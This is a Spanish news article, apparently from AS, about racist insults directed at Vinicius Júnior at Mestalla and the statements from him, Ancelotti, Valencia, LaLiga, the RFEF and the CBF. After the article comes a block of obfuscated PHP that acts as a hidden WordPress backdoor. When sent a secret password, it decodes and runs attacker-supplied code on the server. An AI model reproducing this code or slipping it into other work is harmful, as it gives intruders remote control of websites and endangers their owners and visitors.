Vinicius, indignado: “España es conocida como un país de racistas”

“El premio que los racistas han ganado fue mi expulsión”, posteó el brasileño en un doble comunicado a través de Instagram. La RFEF y la CBF salieron en su defensa.

Mestalla escribió otro capítulo en la lista de episodios racistas de esta temporada, de nuevo con Vinicius Júnior en el ojo del huracán. El extremo brasileño vio la roja en el extenso tiempo de prolongación después de una serie de incidentes que comenzaron con el supuesto insulto racista desde la grada y que el madridista consiguió localizar.

La expulsión del aficionado valencianista por parte de la Policía Nacional fue el detonante de los hechos: el estadio che se encendió y acabó de tomarla con el brasileño, que acabó agrediendo a Hugo Duro en una tangana, en la que Ricardo De Burgos Bengoetxea resolvió mostrando la roja al madridista tras acudir al VAR. “El premio que los racistas han ganado fue mi expulsión. No es fútbol, es LaLiga”, posteó el ex del Flamengo mediante una story a través de su cuenta oficial de Instagram, señalando, como hizo posteriormente Carlo Ancelotti, al organismo presidido por Javier Tebas. Tras ello, Vinicius se marchó gesticulando con el descenso del Valencia a Segunda.

Doble comunicado de Vinicius

Minutos después de la primera publicación, Vinicius volvió a recurrir a las redes sociales para ampliar su duro mensaje de condena y tildó a LaLiga de racista: “No era la primera vez, ni la segunda, ni la tercera. El racismo es normal en LaLiga. La competición cree que es normal, la Federación también y los adversarios la alientan. Lo siento. El campeonato que alguna vez fue de Ronaldinho, Ronaldo, Cristiano y Messi, hoy es de los racistas. Una hermosa nación, que me acogió y a la que amo, pero que accedió a exportar al mundo la imagen de un país racista. Lo siento por los españoles que no están de acuerdo, pero hoy, en Brasil, España es conocida como un país de racistas. Y desafortunadamente, para todo lo que sucede cada semana, no tengo defensa. Estoy de acuerdo. Pero soy fuerte y llegaré hasta el final contra los racistas. Aunque sea lejos de aquí”.

Ancelotti también se apuntó al recurso de las redes sociales para mantener el discurso que dio en la conferencia de prensa posterior al encuentro: “Hoy ha sido un día triste en Mestalla, donde un grupo de aficionados ha mostrado su peor versión. Es hora de dejar de hablar y actuar con contundencia. El racismo no puede tener cabida ni en el fútbol ni en la sociedad. NO AL RACISMO EN NINGÚN SITIO”. Rudiger también aprovechó las redes sociales para enviarle un mensaje de apoyo a su compañero: “2023 y todavía… vergonzoso… Estamos contigo Vini”.

Tras el encuentro, tanto el Valencia, a través de un comunicado, como el capitán del equipo che, José Luis Gayá, condenaron los insultos racistas proferidos desde la grada de Mestalla contra Vinicius. El defensa valencianista no se anduvo con paños calientes y criticó duramente los insultos: “Lo condenamos y para eso están las cámaras. Si está claro quién ha sido, para mí no tiene que entrar más en un campo de fútbol. No tienen ningún sentido los insultos racistas”.

LaLiga, por su parte, ha anunciado que ya ha tomado medidas. Ha solicitado las imágenes disponibles en el estadio para investigar lo sucedido y en caso de detectar un delito de odio, como denuncia Vinicius, procederán a tomar las acciones legales oportunas. Además, también investigará las imágenes en las que supuestamente se profirieron insultos racistas dirigidos hacia Vinicius Jr. en los exteriores del estadio de Mestalla. Y añaden desde la patronal: “LaLiga se ha mostrado proactiva ante todos los incidentes racistas contra Vinicius Jr. Así, LaLiga ha presentado denuncia en nueve ocasiones en las últimas dos temporadas ante el Comité de Competición de la RFEF, Comisión Estatal contra la Violencia, el Racismo, la Xenofobia y la Intolerancia en el Deporte, la Fiscalía de Odio y los Juzgados”.

LaLiga, ante este suceso, pide colaboración para “acelerar la identificación de cualquier persona o grupo de personas que manifiesten conductas racistas en cualquier estadio o fuera de él” y recuerdan que para ello está habilitado el correo de [email protected]

La RFEF pide medidas contundentes

La Federación Española de Fútbol (RFEF) se pronunció tras los insultos racistas recibidos por Vinicius Júnior en Mestalla. Exige “medidas más contundentes de manera inmediata”.

“A propósito de los acontecimientos producidos esta tarde en Mestalla”:

La Federación está consternada con lo sucedido y entiende que deben erradicarse estas actitudes. Por ello, insta a que se activen con urgencia los protocolos para que las medidas más contundentes se adopten de manera inmediata. Tanto el comité como la Comisión Estatal antiviolencia y xenofobia y racismo en el deporte deberían tomar cartas en el asunto incluso con cierres de gradas cada vez que esto suceda y de estadios cuando sea por reincidencia”.

“La RFEF insta a los clubes a colaborar en la erradicación inmediata de estos hechos lamentables respetando las reglas y sanciones deportivas y no dilatándolas con recursos judiciales artificiosos”.

Toque de la CBF a LaLiga

La Confederación Brasileña de Fútbol (CBF), en nombre de su presidente, Ednaldo Rodrigues, también se personó en el caso, respaldando a Vinicius Júnior y poniendo de relieve lo que tilda de “enfermedad mundial”.

¿Cuánto tiempo vamos a vivir, en pleno siglo XXI, episodios como el que acabamos de presenciar, una vez más, en LaLiga? ¿Hasta cuándo la humanidad seguirá siendo espectadora y cómplice de crueles actos de racismo? ¿Cuánto tiempo necesitaremos recordar que es un crimen? ¿Hasta cuándo vamos a tener que luchar por actitudes concretas y efectivas dentro y fuera de las canchas? No hay alegría donde hay racismo. Tienes todo nuestro cariño y el de todos los brasileños, Vinicius. No solo tú, sino todos los que han padecido y padecen esta enfermedad mundial que es el racismo. El color de la piel ya no puede molestar”, reza el texto publicado en su cuenta oficial de Twitter.

Texto íntegro del comunicado del Valencia

El Valencia CF desea condenar públicamente cualquier tipo de insulto, ataque o descalificación en el fútbol.

El Club, en su compromiso con los valores del respeto y del deporte, reafirma públicamente su posición contra la violencia física y verbal en los estadios y lamenta los hechos acontecidos durante el transcurso del partido de la Jornada 35 de LaLiga contra el Real Madrid.

Aunque se trata de un episodio aislado, los insultos a cualquier futbolista del equipo rival no tienen cabida en el fútbol y no encajan con los valores y la identidad del Valencia CF. El Club está investigando lo acontecido y tomará las medidas más severas. Del mismo modo, el Valencia CF condena cualquier ofensa y pide el máximo respeto también hacia nuestra afición.

Al margen de estos hechos aislados, el Valencia CF quiere agradecer a los más de 46.000 aficionados su asistencia y apoyo al equipo en el partido de este domingo 21 de mayo.

AS

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}